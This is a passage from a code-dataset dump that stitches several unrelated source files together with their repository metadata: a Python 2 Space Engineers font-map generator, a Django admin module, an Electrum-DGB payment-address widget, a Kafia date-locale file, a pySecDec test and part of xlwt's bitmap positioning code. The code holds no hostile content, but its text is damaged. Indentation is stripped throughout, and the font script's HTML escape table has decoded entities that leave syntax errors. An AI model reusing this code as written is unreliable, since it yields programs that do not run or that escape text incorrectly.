'shadow_size': shadow_size,
'shadow' : False },
'green': {
'output' : True,
'color': green,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : False },
'red': {
'output' : True,
'color': red,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : False },
'white': {
'output' : True,
'color': white,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : False },
'white_shadow': {
'output' : True,
'color': white,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : True }
}
# Left Side Bearing, lsb
#
# illusion:
#
# |< last >| |< this >|
# |< char >| |< char >|
# |< bitmap >||< lsb >||< bitmap >|
#
, 'lsb'
: -1
# font map xml template file
, 'xml template'
: 'xml_template.xml'
# font map xml file name
, 'xml file name'
: 'FontData.xml'
# font place holder north margin
, 'north margin'
: 0
# font place holder west margin
, 'west margin'
: 0
# font place holder south margin
, 'south margin'
: 0
# font place holder east margin
, 'east margin'
: 0
# keep original font map
, 'keep original font map'
: True
, 'text file folder'
: 'text_files'
, 'unsupported folder'
: 'unsupported'
, 'backup folder'
: 'backup'
, 'output folder'
: 'output'
}
keep_original = bool(config['keep original font map'])
output_dds_prefix = str(config['output dds prefix'])
original_dds_file_names = config['original dds file names']
se_folder = str(config['space engineer base folder'])
font_size = int(config['font size'])
base_folder = str(config['base folder'])
font_folder = base_folder + str(config['font folder'])
font_folder = os.path.abspath(font_folder)
output_folder = base_folder + str(config['output folder'])
output_folder = os.path.abspath(output_folder)
font_priority_list = config['font priority list']
font_priority_list = []
font_files_in_folder = file_names_in_folder(font_folder)
font_files = [ join(font_folder, f) for f in list(font_priority_list)]
for f in font_files_in_folder :
if f not in font_priority_list :
font_files.append(join(font_folder, f))
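  # Note (comment added for clarity): freetype is never imported in this
  # script, so 'face' below is kept as a placeholder string rather than a
  # real freetype.Face object; haschar() in char.map always returns True.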
fonts = [ { 'face' : 'freetype.Face(f)',
'font' : ImageFont.truetype(f, font_size),
'font_size' : font_size,
'file_name' : os.path.basename(f)}
for f in font_files ]
unsupported_folder = config['unsupported folder']
image_width = int(config['image width'])
image_height = int(config['image height'])
color_dict = config['predefined colors']
lsb = config['lsb']
xml_template_name = str(config['xml template'])
xml_file_name = str(config['xml file name'])
north_margin = int(config['north margin'])
west_margin = int(config['west margin'])
south_margin = int(config['south margin'])
east_margin = int(config['east margin'])
text_file_folder = os.path.abspath(str(config['text file folder']))
backup_folder = str(config['backup folder'])
if 'define classes' :
class location() :
'''
Location class
'''
def __init__(self, x, y) :
self.x = x
self.y = y
def clone(self) :
return location(x, y)
def __str__(self) :
return '(%s, %s)' % (self.x, self.y)
def add_sub_action(self, another_location, mode = '+') :
def add_sub(a, b, mode = '+') :
if mode == '+' :
return a + b
if mode == '-' :
return a - b
raise NotImplementedError()
if isinstance(another_location, location) :
return location(
add_sub( self.x,
another_location.x,
mode),
add_sub( self.y,
another_location.y,
mode))
if isinstance(another_location, tuple) \
or isinstance(another_location, list) :
if len(another_location) == 2 :
return location(
add_sub( self.x,
int(another_location[0]),
mode),
add_sub( self.y,
int(another_location[1]),
mode))
if isinstance(another_location, dict) :
if 'x' in another_location.keys() and 'y' in another_location.keys() :
return location(
add_sub( self.x,
int(another_location['x']),
mode),
add_sub( self.y,
int(another_location['y']),
mode))
raise NotImplementedError()
def __add__(self, another_location) :
return self.add_sub_action(another_location, mode = '+')
def __sub__(self, another_location) :
return self.add_sub_action(another_location, mode = '-')
class char() :
'''
Character class
'''
def __init__(self, content) :
self.content = content
def map(self, color, fonts,
north_margin = north_margin,
west_margin = west_margin,
south_margin = south_margin,
east_margin = east_margin,
unsupported = {}) :
def haschar(font, one_character, unsupported = {}) :
'''
Return if a font has a character.
'''
return True
# ttf_face = font['face']
# font_file_name = font['file_name']
# ttf_face.set_char_size( 48*64 )
# ttf_face.load_char(one_character)
# a = copy.deepcopy(ttf_face.glyph.bitmap.buffer)
# b = []
# if font_file_name in unsupported.keys() :
# if one_character in unsupported[ font_file_name ] :
# return False
# ttf_face.load_char(unsupported[ font_file_name ][0])
# b = copy.deepcopy(ttf_face.glyph.bitmap.buffer)
# return a != b
self.color = color
self.font = None
for f in fonts :
if haschar(f, one_character = self.content,
unsupported = unsupported) :
self.font = f['font']
self.font_size = f['font_size']
break
      if self.font is None :
print 'Warning! No font file has \'%s\'.' % self.content
self.font = fonts[0]['font']
self.font_size = f['font_size']
self.width, self.height = self.font.getsize(self.content)
self.shadow_size = color['shadow_size']
self.width += (self.shadow_size * 2)
self.height += (self.shadow_size * 2)
self.size = (self.width, self.height)
self.holder_height = north_margin + self.font_size + south_margin
self.holder_height += (self.shadow_size * 4)
self.holder_width = west_margin + self.width + east_margin
self.holder_size = (self.holder_width, self.holder_height)
def locate(self, code, image_location, image_index, left_sep) :
self.code = code
self.image_location = image_location
self.image_index = image_index
self.left_sep = left_sep
def attribute(self) :
return { 'content' : escape(self.content),
'code' : get_code_string(self.code),
'image_index' : self.image_index,
'x' : self.image_location.x,
'y' : self.image_location.y + self.shadow_size,
'width' : self.width-1,
'height' : self.holder_height - (self.shadow_size*2),
'advance_width' : self.width - (self.shadow_size*2),
'left_sep' : self.left_sep }
if 'define misc. functions' :
def cleanup(folder_paths, file_names = [], remove_ext_name = ['.pyc', '.png']) :
for folder_path in folder_paths :
for f in file_names :
os.remove(join(os.path.abspath(folder_path), f))
for f in file_names_in_folder(folder_path) :
for ext_name in remove_ext_name :
if f.endswith(ext_name) :
os.remove(join(folder_path, f))
def distinct(string_list) :
one_list = ''
for s in string_list :
one_list += s
one_list = list(set(one_list))
return one_list
def save_dds(pillow_image, index = 0, output_folder = './'):
output_folder = os.path.abspath(output_folder)
temp_file_path = join(output_folder, 'temp_%s.png' % index)
output_file_path = join(output_folder, '%s%s.dds' % (output_dds_prefix, index))
pillow_image.save(temp_file_path)
os.system(r'.\nvtt\nvcompress.exe -nocuda -bc3 %s %s' \
% (temp_file_path, output_file_path ))
os.remove(temp_file_path)
def compute_location(one_char, draw_location, target_images) :
(w, h) = target_images[-1].size
# to the next line
if draw_location.x + one_char.holder_width >= w :
draw_location.y += one_char.holder_height
draw_location.x = 0
# to the next image
if draw_location.y + one_char.holder_height >= h :
target_images.append(get_default_image())
draw_location.y = 0
return draw_location, target_images
def draw_one_char_to_image(one_char, draw_location, target_image, west_margin, south_margin) :
'''
Draw one char on one image
'''
def draw_once(draw, color, xshift, yshift,) :
draw.text( ( draw_location.x + xshift,
draw_location.y + yshift),
one_char.content,
font = one_char.font,
fill = color )
draw = ImageDraw.Draw(target_image)
if one_char.color['shadow'] == True :
for i in xrange(one_char.shadow_size) :
draw_once(draw, one_char.color['shadow_color'], +i, +i)
draw_once(draw, one_char.color['shadow_color'], one_char.shadow_size + 1 + i, +i)
draw_once(draw, one_char.color['shadow_color'], +i, one_char.shadow_size + 1 + i)
draw_once(draw, one_char.color['shadow_color'],
one_char.shadow_size + 1 + i, one_char.shadow_size + 1 + i)
draw_once(draw, one_char.color['color'], one_char.shadow_size, one_char.shadow_size)
return draw_location + (one_char.holder_width, 0), target_image
def write_char_to_image( one_char, draw_location, code,
image_start_index,
target_images = [ get_default_image() ] ) :
if not isinstance(target_images, list) :
target_images = [ target_images ]
# compute char bitmap location
draw_location, target_images \
= compute_location(one_char, draw_location, target_images)
one_char.locate(code, draw_location, image_start_index + len(target_images) - 1, lsb)
# draw one char
loc, target_images[-1] \
= draw_one_char_to_image( one_char, draw_location, target_images[-1],
west_margin, south_margin)
return one_char, loc, target_images
def save_images(images, output_folder) :
i = 0
for image in images :
save_dds(image, i, output_folder)
i += 1
def get_code_string(decimal_code) :
return hex(decimal_code).split('x')[1]
def escape(input_string) :
html_escape_table = {
unicode('&'): unicode("&"),
unicode('"'): unicode("""),
unicode("'"): unicode("'"),
unicode(">"): unicode(">"),
unicode("<"): unicode("<") }
input_string = unicode(input_string)
if input_string in html_escape_table.keys() :
return html_escape_table[ input_string ]
return input_string
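  # Note (comment added for clarity): only exact single-entity strings are
  # escaped above; any other input is returned unchanged.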
def get_char_list(xml_file_name) :
tree = ET.parse(xml_file_name)
root = tree.getroot()
glyphs = [ child for child in root if child.tag.endswith('glyphs') ][0]
max_code = max([ int('0x' + glyph.attrib['code'], 16) for glyph in glyphs ])
return [ glyph.attrib['ch'] for glyph in glyphs ], max_code
def get_original_xml_attributes(xml_file_name) :
tree = ET.parse(xml_file_name)
root = tree.getroot()
glyphs = [ child for child in root if child.tag.endswith('glyphs') ][0]
kernpairs = [ child for child in root if child.tag.endswith('kernpairs') ][0]
glyphs_attribute_list = [ {
'content' : escape(glyph.attrib['ch']),
'code' : glyph.attrib['code'],
'bm' : glyph.attrib['bm'],
'origin' : glyph.attrib['origin'],
'size' : glyph.attrib['size'],
'aw' : glyph.attrib['aw'],
'lsb' : glyph.attrib['lsb'] }
for glyph in glyphs ]
kernpair_attribute_list = [ {
'left' : escape(kernpair.attrib['left']),
'right' : escape(kernpair.attrib['right']),
'adjust' : kernpair.attrib['adjust'] }
for kernpair in kernpairs ]
return glyphs_attribute_list, kernpair_attribute_list
def write_text_to_image(text, color, unsupported, start_code, output_folder = output_folder,
image_start_index = 0,
north_margin = north_margin,
west_margin = west_margin,
south_margin = south_margin,
east_margin = east_margin) :
draw_location = location(0, 0)
target_images = [ get_default_image() ]
current_code = start_code
char_list = []
for c in text :
# create a char object
one_char = char(content = c)
# map a char to a bitmap
one_char.map( color = color, fonts = fonts,
north_margin = north_margin,
west_margin = west_margin,
south_margin = south_margin,
east_margin = east_margin,
unsupported = unsupported )
one_char, draw_location, target_images \
= write_char_to_image( one_char = one_char,
draw_location = draw_location,
code = current_code,
image_start_index = image_start_index,
target_images = target_images )
char_list.append(one_char)
current_code += 1
save_images(target_images, output_folder)
return char_list, target_images
def produce_xml(char_list, target_images, output_folder,
keep_original, original_xml_file_name) :
env = jinja2.Environment()
env.loader = jinja2.FileSystemLoader('./')
template = env.get_template(xml_template_name)
xml_file = open(join(output_folder, xml_file_name), 'w+')
char_attribute_list = [ c.attribute() for c in char_list ]
dds_files = []
glyphs_attribute_list = []
kernpair_attribute_list = []
image_index = 0
if keep_original == True :
for n in original_dds_file_names :
dds_files.append( { 'index' : image_index, 'name': n } )
image_index += 1
glyphs_attribute_list, kernpair_attribute_list = \
get_original_xml_attributes(original_xml_file_name)
dds_files += [ { 'index' : i + image_index, 'name': '%s%s.dds' % (output_dds_prefix, i) }
for i in xrange(len(target_images)) ]
xml_file.write( template.render(
char_attribute_list = char_attribute_list,
dds_files = dds_files,
glyphs_attribute_list = glyphs_attribute_list,
kernpair_attribute_list = kernpair_attribute_list ) )
def get_original_text(base_folder, backup_folder, xml_file_name) :
original_xml_file_name = join(backup_folder, 'red\\' + xml_file_name)
original_xml_file_name_copy = join(base_folder, 'original_' + xml_file_name)
shutil.copy2(original_xml_file_name, original_xml_file_name_copy)
return get_char_list(xml_file_name = original_xml_file_name_copy)
def backup_se_font_map(se_folder, backup_folder) :
if not os.path.exists(backup_folder) :
shutil.copytree(join(se_folder, 'Content\\Fonts'), backup_folder )
else :
if not os.listdir(backup_folder) :
os.rmdir(backup_folder )
shutil.copytree(join(se_folder, 'Content\\Fonts'), backup_folder )
def include_text_files(base_folder, text_file_folder) :
text_files = file_names_in_folder(text_file_folder)
text_mod_files = [ f for f in text_files if f.endswith('.py') ]
for f in text_files :
shutil.copy2(join(text_file_folder, f), join(base_folder, f))
text_file_modules = [ __import__( f.split('.')[0]) for f in text_mod_files ]
result = []
for m in text_file_modules :
result += distinct(m.text)
return text_files, distinct(result)
def check_unsupported_files (base_folder, unsupported_folder) :
unsupported_files = file_names_in_folder(unsupported_folder)
for f in unsupported_files :
shutil.copy2(join(unsupported_folder, f), join(base_folder, f))
unsupported_file_modules = [ __import__( f.split('.')[0]) for f in unsupported_files ]
unsupported = {}
for m in unsupported_file_modules :
for key, value in m.unsupported_char.items() :
unsupported[key] = value
return unsupported_files, unsupported
start_time = timeit.default_timer()
backup_se_font_map(se_folder, backup_folder)
text_original, max_code = get_original_text(base_folder, backup_folder, xml_file_name)
text_files, text_in_files = include_text_files(base_folder, text_file_folder)
unsupported_files, unsupported = check_unsupported_files (base_folder, unsupported_folder)
if not os.path.exists(output_folder) :
os.mkdir(output_folder)
if not keep_original :
text = distinct(text_in_files + text_original)
start_code = 0
else :
text = list(set(text_in_files).symmetric_difference(text_original))
start_code = max_code + 1
# generate font map
for c, v in color_dict.items() :
if v['output'] == True :
print 'Generate bitmap for %s ...' % c
if os.path.exists(join(output_folder, c)) :
shutil.rmtree(join(output_folder, c))
if not os.path.exists(join(output_folder, c)) :
os.mkdir(join(output_folder, c))
if keep_original == True :
for n in original_dds_file_names :
shutil.copy2(
join( backup_folder, c + '\\' + n),
join( output_folder, c + '\\' + n) )
original_xml_file_name \
= os.path.abspath(join( backup_folder, c + '\\' + xml_file_name))
print 'Done'
print
print 'Write bitmap to dds.'
char_list, target_images \
= write_text_to_image(
text = text, color = v, unsupported = unsupported,
start_code = copy.deepcopy(start_code),
output_folder = join(output_folder, c),
image_start_index = len(original_dds_file_names),
north_margin = north_margin, west_margin = west_margin,
south_margin = south_margin, east_margin = east_margin )
print 'Done'
print
    print 'Generate XML for %s ...' % c
produce_xml(char_list, target_images, join(output_folder, c),
keep_original, original_xml_file_name)
print 'Done'
print 'All image and XMl generations done.'
print
print 'Cleaning up temp files...'
cleanup( folder_paths = [ base_folder ],
file_names = text_files + unsupported_files,
remove_ext_name = ['.pyc', '.png', '.csv', 'original_' + xml_file_name])
print 'Done'
print 'Total run time is %f.' % (timeit.default_timer() - start_time)
|
mit
| -8,668,873,927,178,910,000 | 28.970551 | 96 | 0.594181 | false |
botswana-harvard/getresults-csv
|
getresults_csv/admin.py
|
1
|
1632
|
from django.contrib import admin
from edc_base.modeladmin.admin import LimitedAdminInlineMixin
from getresults.admin import admin_site
from .models import ExportHistory, ImportHistory, CsvFormat, CsvField, CsvDictionary
from getresults_csv.forms import CsvDictionaryForm
class CsvFieldAdmin(admin.ModelAdmin):
list_display = ('csv_format', 'name')
admin_site.register(CsvField, CsvFieldAdmin)
class CsvDictionaryAdmin(admin.ModelAdmin):
form = CsvDictionaryForm
list_display = ('csv_format', 'csv_field', 'processing_field', 'utestid')
search_fields = ('csv_field', 'processing_field', 'utestid__name')
admin_site.register(CsvDictionary, CsvDictionaryAdmin)
class CsvDictionaryInline(LimitedAdminInlineMixin, admin.TabularInline):
model = CsvDictionary
form = CsvDictionaryForm
extra = 0
def get_filters(self, obj):
if obj:
return (('csv_field', dict(csv_format=obj.id)),)
else:
return ()
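        # Note (comment added for clarity): each (field_name, filter_kwargs)
        # pair limits the inline's csv_field choices to rows whose csv_format
        # matches the parent object being edited.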
class CsvFormatAdmin(admin.ModelAdmin):
list_display = ('name', 'sender_model', 'delimiter', 'encoding')
inlines = [CsvDictionaryInline]
admin_site.register(CsvFormat, CsvFormatAdmin)
class ImportHistoryAdmin(admin.ModelAdmin):
list_display = ('source', 'import_datetime', 'record_count')
search_fields = ('source', 'import_datetime', 'record_count')
admin_site.register(ImportHistory, ImportHistoryAdmin)
class ExportHistoryAdmin(admin.ModelAdmin):
list_display = ('destination', 'export_datetime', 'reference')
search_fields = ('destination', 'export_datetime', 'reference')
admin_site.register(ExportHistory, ExportHistoryAdmin)
|
gpl-2.0
| -5,663,246,594,499,837,000 | 32.306122 | 84 | 0.735294 | false |
protonn/Electrum-Cash
|
gui/qt/paytoedit.py
|
1
|
9510
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qrtextedit import ScanQRTextEdit
import re
from decimal import Decimal
from electrum_dgb import bitcoin
import util
RE_ADDRESS = '[1-9A-HJ-NP-Za-km-z]{26,}'
RE_ALIAS = '(.*?)\s*\<([1-9A-HJ-NP-Za-km-z]{26,})\>'
frozen_style = "QWidget { background-color:none; border:none;}"
normal_style = "QPlainTextEdit { }"
class PayToEdit(ScanQRTextEdit):
def __init__(self, win):
ScanQRTextEdit.__init__(self)
self.win = win
self.amount_edit = win.amount_e
self.document().contentsChanged.connect(self.update_size)
self.heightMin = 0
self.heightMax = 150
self.c = None
self.textChanged.connect(self.check_text)
self.outputs = []
self.errors = []
self.is_pr = False
self.is_alias = False
self.scan_f = win.pay_to_URI
self.update_size()
self.payto_address = None
self.previous_payto = ''
def setFrozen(self, b):
self.setReadOnly(b)
self.setStyleSheet(frozen_style if b else normal_style)
for button in self.buttons:
button.setHidden(b)
def setGreen(self):
self.setStyleSheet(util.GREEN_BG)
def setExpired(self):
self.setStyleSheet(util.RED_BG)
def parse_address_and_amount(self, line):
x, y = line.split(',')
out_type, out = self.parse_output(x)
amount = self.parse_amount(y)
return out_type, out, amount
def parse_output(self, x):
try:
address = self.parse_address(x)
return bitcoin.TYPE_ADDRESS, address
except:
script = self.parse_script(x)
return bitcoin.TYPE_SCRIPT, script
def parse_script(self, x):
from electrum_dgb.transaction import opcodes, push_script
script = ''
for word in x.split():
if word[0:3] == 'OP_':
assert word in opcodes.lookup
script += chr(opcodes.lookup[word])
else:
script += push_script(word).decode('hex')
return script
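        # Illustrative note (not part of the original file): a line such as
        #   "OP_RETURN 646967696279746521"
        # assembles to the OP_RETURN opcode byte followed by a push of the
        # payload bytes.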
def parse_amount(self, x):
if x.strip() == '!':
return '!'
p = pow(10, self.amount_edit.decimal_point())
return int(p * Decimal(x.strip()))
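        # Illustrative note (not part of the original file): with a decimal
        # point of 8, parse_amount('1.5') returns 150000000 base units, and
        # '!' requests the maximum spendable amount.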
def parse_address(self, line):
r = line.strip()
m = re.match('^'+RE_ALIAS+'$', r)
address = str(m.group(2) if m else r)
assert bitcoin.is_address(address)
return address
def check_text(self):
self.errors = []
if self.is_pr:
return
# filter out empty lines
lines = filter(lambda x: x, self.lines())
outputs = []
total = 0
self.payto_address = None
if len(lines) == 1:
data = lines[0]
if data.startswith("digibyte:"):
self.scan_f(data)
return
try:
self.payto_address = self.parse_output(data)
except:
pass
if self.payto_address:
self.win.lock_amount(False)
return
is_max = False
for i, line in enumerate(lines):
try:
_type, to_address, amount = self.parse_address_and_amount(line)
except:
self.errors.append((i, line.strip()))
continue
outputs.append((_type, to_address, amount))
if amount == '!':
is_max = True
else:
total += amount
self.win.is_max = is_max
self.outputs = outputs
self.payto_address = None
if self.win.is_max:
self.win.do_update_fee()
else:
self.amount_edit.setAmount(total if outputs else None)
self.win.lock_amount(total or len(lines)>1)
def get_errors(self):
return self.errors
def get_recipient(self):
return self.payto_address
def get_outputs(self, is_max):
if self.payto_address:
if is_max:
amount = '!'
else:
amount = self.amount_edit.get_amount()
_type, addr = self.payto_address
self.outputs = [(_type, addr, amount)]
return self.outputs[:]
def lines(self):
return unicode(self.toPlainText()).split('\n')
def is_multiline(self):
return len(self.lines()) > 1
def paytomany(self):
self.setText("\n\n\n")
self.update_size()
def update_size(self):
docHeight = self.document().size().height()
h = docHeight*17 + 11
if self.heightMin <= h <= self.heightMax:
self.setMinimumHeight(h)
self.setMaximumHeight(h)
self.verticalScrollBar().hide()
def setCompleter(self, completer):
self.c = completer
self.c.setWidget(self)
self.c.setCompletionMode(QCompleter.PopupCompletion)
self.c.activated.connect(self.insertCompletion)
def insertCompletion(self, completion):
if self.c.widget() != self:
return
tc = self.textCursor()
extra = completion.length() - self.c.completionPrefix().length()
tc.movePosition(QTextCursor.Left)
tc.movePosition(QTextCursor.EndOfWord)
tc.insertText(completion.right(extra))
self.setTextCursor(tc)
def textUnderCursor(self):
tc = self.textCursor()
tc.select(QTextCursor.WordUnderCursor)
return tc.selectedText()
def keyPressEvent(self, e):
if self.isReadOnly():
return
if self.c.popup().isVisible():
if e.key() in [Qt.Key_Enter, Qt.Key_Return]:
e.ignore()
return
if e.key() in [Qt.Key_Tab]:
e.ignore()
return
if e.key() in [Qt.Key_Down, Qt.Key_Up] and not self.is_multiline():
e.ignore()
return
QPlainTextEdit.keyPressEvent(self, e)
        ctrlOrShift = e.modifiers() & (Qt.ControlModifier | Qt.ShiftModifier)
if self.c is None or (ctrlOrShift and e.text().isEmpty()):
return
eow = QString("~!@#$%^&*()_+{}|:\"<>?,./;'[]\\-=")
        hasModifier = (e.modifiers() != Qt.NoModifier) and not ctrlOrShift
completionPrefix = self.textUnderCursor()
if hasModifier or e.text().isEmpty() or completionPrefix.length() < 1 or eow.contains(e.text().right(1)):
self.c.popup().hide()
return
if completionPrefix != self.c.completionPrefix():
            self.c.setCompletionPrefix(completionPrefix)
self.c.popup().setCurrentIndex(self.c.completionModel().index(0, 0))
cr = self.cursorRect()
cr.setWidth(self.c.popup().sizeHintForColumn(0) + self.c.popup().verticalScrollBar().sizeHint().width())
self.c.complete(cr)
def qr_input(self):
data = super(PayToEdit,self).qr_input()
if data.startswith("digibyte:"):
self.scan_f(data)
# TODO: update fee
def resolve(self):
self.is_alias = False
if self.hasFocus():
return
if self.is_multiline(): # only supports single line entries atm
return
if self.is_pr:
return
key = str(self.toPlainText())
if key == self.previous_payto:
return
self.previous_payto = key
        if not (('.' in key) and ('<' not in key) and (' ' not in key)):
return
try:
data = self.win.contacts.resolve(key)
except:
return
if not data:
return
self.is_alias = True
address = data.get('address')
name = data.get('name')
new_url = key + ' <' + address + '>'
self.setText(new_url)
self.previous_payto = new_url
#if self.win.config.get('openalias_autoadd') == 'checked':
self.win.contacts[key] = ('openalias', name)
self.win.contact_list.on_update()
self.setFrozen(True)
if data.get('type') == 'openalias':
self.validated = data.get('validated')
if self.validated:
self.setGreen()
else:
self.setExpired()
else:
self.validated = None
|
mit
| -1,738,034,398,156,646,700 | 30.078431 | 113 | 0.573817 | false |
scrapinghub/dateparser
|
dateparser/data/date_translation_data/ksf.py
|
1
|
2783
|
info = {
"name": "ksf",
"date_order": "DMY",
"january": [
"ŋ1",
"ŋwíí a ntɔ́ntɔ"
],
"february": [
"ŋ2",
"ŋwíí akǝ bɛ́ɛ"
],
"march": [
"ŋ3",
"ŋwíí akǝ ráá"
],
"april": [
"ŋ4",
"ŋwíí akǝ nin"
],
"may": [
"ŋ5",
"ŋwíí akǝ táan"
],
"june": [
"ŋ6",
"ŋwíí akǝ táafɔk"
],
"july": [
"ŋ7",
"ŋwíí akǝ táabɛɛ"
],
"august": [
"ŋ8",
"ŋwíí akǝ táaraa"
],
"september": [
"ŋ9",
"ŋwíí akǝ táanin"
],
"october": [
"ŋ10",
"ŋwíí akǝ ntɛk"
],
"november": [
"ŋ11",
"ŋwíí akǝ ntɛk di bɔ́k"
],
"december": [
"ŋ12",
"ŋwíí akǝ ntɛk di bɛ́ɛ"
],
"monday": [
"lǝn",
"lǝndí"
],
"tuesday": [
"maa",
"maadí"
],
"wednesday": [
"mɛk",
"mɛkrɛdí"
],
"thursday": [
"jǝǝ",
"jǝǝdí"
],
"friday": [
"júm",
"júmbá"
],
"saturday": [
"sam",
"samdí"
],
"sunday": [
"sɔ́n",
"sɔ́ndǝ"
],
"am": [
"sárúwá"
],
"pm": [
"cɛɛ́nko"
],
"year": [
"bǝk"
],
"month": [
"ŋwíí"
],
"week": [
"sɔ́ndǝ"
],
"day": [
"ŋwós"
],
"hour": [
"cámɛɛn"
],
"minute": [
"mǝnít"
],
"second": [
"háu"
],
"relative-type": {
"0 day ago": [
"gɛ́ɛnǝ"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 month ago": [
"this month"
],
"0 second ago": [
"now"
],
"0 week ago": [
"this week"
],
"0 year ago": [
"this year"
],
"1 day ago": [
"rinkɔɔ́"
],
"1 month ago": [
"last month"
],
"1 week ago": [
"last week"
],
"1 year ago": [
"last year"
],
"in 1 day": [
"ridúrǝ́"
],
"in 1 month": [
"next month"
],
"in 1 week": [
"next week"
],
"in 1 year": [
"next year"
]
},
"locale_specific": {},
"skip": [
" ",
"'",
",",
"-",
".",
"/",
";",
"@",
"[",
"]",
"|",
","
]
}
|
bsd-3-clause
| -6,306,315,758,747,220,000 | 14.650888 | 31 | 0.272212 | false |
mppmu/secdec
|
high_level_tests/box1L_rank4/test/test.py
|
1
|
3321
|
from __future__ import print_function
from pySecDec.integral_interface import IntegralLibrary
import sympy as sp
import unittest
class CheckLib(unittest.TestCase):
def setUp(self):
# load c++ library
self.lib = IntegralLibrary('../box1L_rank4/box1L_rank4_pylink.so')
self.real_parameters = [16.0, -75.0, 1.0]
self.maxeval = 10**8
self.epsrel = 1e-10
self.epsabs = 1e-13
self.target_result_without_prefactor = \
{
0: 97.52083333333 + 0.0j,
1: -124.937368867 - 11.9030583278j
}
self.target_prefactor = \
{
-1: 1.0,
0: -0.57721566490153,
}
self.target_result_with_prefactor = \
{
-1: 97.52083333333 + 0.0j,
0: -181.22792152123 - 11.903058327787j
}
def check_result(self, computed_series, target_series, epsrel, epsabs, order_min, order_max):
# convert result to sympy expressions
computed_series = sp.sympify( computed_series.replace(',','+I*').replace('+/-','*value+error*') )
for order in range(order_min, order_max+1):
value = complex( computed_series.coeff('eps',order).coeff('value') )
error = complex( computed_series.coeff('eps',order).coeff('error') )
# check that the uncertainties are reasonable
self.assertLessEqual(error.real, abs(2*epsrel * target_series[order].real))
if target_series[order].imag != 0.0:
self.assertLessEqual(error.imag, abs(2*epsrel * target_series[order].imag))
# check that the desired uncertainties are reached
self.assertLessEqual(error.real, abs(epsrel * value.real) )
if target_series[order].imag == 0.0:
self.assertLessEqual(error.imag, epsabs)
else:
self.assertLessEqual(error.imag, abs(epsrel * value.imag) )
# check integral value
self.assertAlmostEqual( value.real, target_series[order].real, delta=epsrel*abs(target_series[order].real) )
if target_series[order].imag == 0.0:
self.assertAlmostEqual( value.imag, target_series[order].imag, delta=epsabs )
else:
self.assertAlmostEqual( value.imag, target_series[order].imag, delta=epsrel*abs(target_series[order].imag) )
def test_Cuhre(self):
# choose integrator
self.lib.use_Cuhre(epsrel=self.epsrel, maxeval=self.maxeval, epsabs=self.epsabs, real_complex_together=True)
# integrate
str_integral_without_prefactor, str_prefactor, str_integral_with_prefactor = self.lib(self.real_parameters)
# check integral
self.check_result(str_integral_without_prefactor, self.target_result_without_prefactor, self.epsrel, self.epsabs, order_min=0, order_max=1)
self.check_result(str_integral_with_prefactor, self.target_result_with_prefactor, self.epsrel, self.epsabs, order_min=-1, order_max=0)
# check prefactor
prefactor = sp.sympify( str_prefactor.replace(',','+I*') )
for order in (-1,0):
self.assertAlmostEqual( prefactor.coeff('eps', order), self.target_prefactor[order], delta=1e-13 )
if __name__ == '__main__':
unittest.main()
|
gpl-3.0
| 7,984,500,369,133,681,000 | 43.28 | 147 | 0.611864 | false |
sternshus/arelle2.7
|
svr-2.7/arelle/xlwt/Bitmap.py
|
1
|
10392
|
# Portions are Copyright (C) 2005 Roman V. Kiseliov
# Portions are Copyright (c) 2004 Evgeny Filatov <fufff@users.sourceforge.net>
# Portions are Copyright (c) 2002-2004 John McNamara (Perl Spreadsheet::WriteExcel)
from arelle.xlwt.BIFFRecords import BiffRecord
from struct import *
def _size_col(sheet, col):
return sheet.col_width(col)
def _size_row(sheet, row):
return sheet.row_height(row)
def _position_image(sheet, row_start, col_start, x1, y1, width, height):
"""Calculate the vertices that define the position of the image as required by
the OBJ record.
+------------+------------+
| A | B |
+-----+------------+------------+
| |(x1,y1) | |
| 1 |(A1)._______|______ |
| | | | |
| | | | |
+-----+----| BITMAP |-----+
| | | | |
| 2 | |______________. |
| | | (B2)|
| | | (x2,y2)|
+---- +------------+------------+
Example of a bitmap that covers some of the area from cell A1 to cell B2.
Based on the width and height of the bitmap we need to calculate 8 vars:
col_start, row_start, col_end, row_end, x1, y1, x2, y2.
The width and height of the cells are also variable and have to be taken into
account.
The values of col_start and row_start are passed in from the calling
function. The values of col_end and row_end are calculated by subtracting
the width and height of the bitmap from the width and height of the
underlying cells.
The vertices are expressed as a percentage of the underlying cell width as
follows (rhs values are in pixels):
x1 = X / W *1024
y1 = Y / H *256
x2 = (X-1) / W *1024
y2 = (Y-1) / H *256
Where: X is distance from the left side of the underlying cell
Y is distance from the top of the underlying cell
W is the width of the cell
H is the height of the cell
Note: the SDK incorrectly states that the height should be expressed as a
percentage of 1024.
col_start - Col containing upper left corner of object
row_start - Row containing top left corner of object
x1 - Distance to left side of object
y1 - Distance to top of object
width - Width of image frame
height - Height of image frame
"""
# Adjust start column for offsets that are greater than the col width
while x1 >= _size_col(sheet, col_start):
x1 -= _size_col(sheet, col_start)
col_start += 1
# Adjust start row for offsets that are greater than the row height
while y1 >= _size_row(sheet, row_start):
y1 -= _size_row(sheet, row_start)
row_start += 1
# Initialise end cell to the same as the start cell
row_end = row_start # Row containing bottom right corner of object
col_end = col_start # Col containing lower right corner of object
width = width + x1 - 1
height = height + y1 - 1
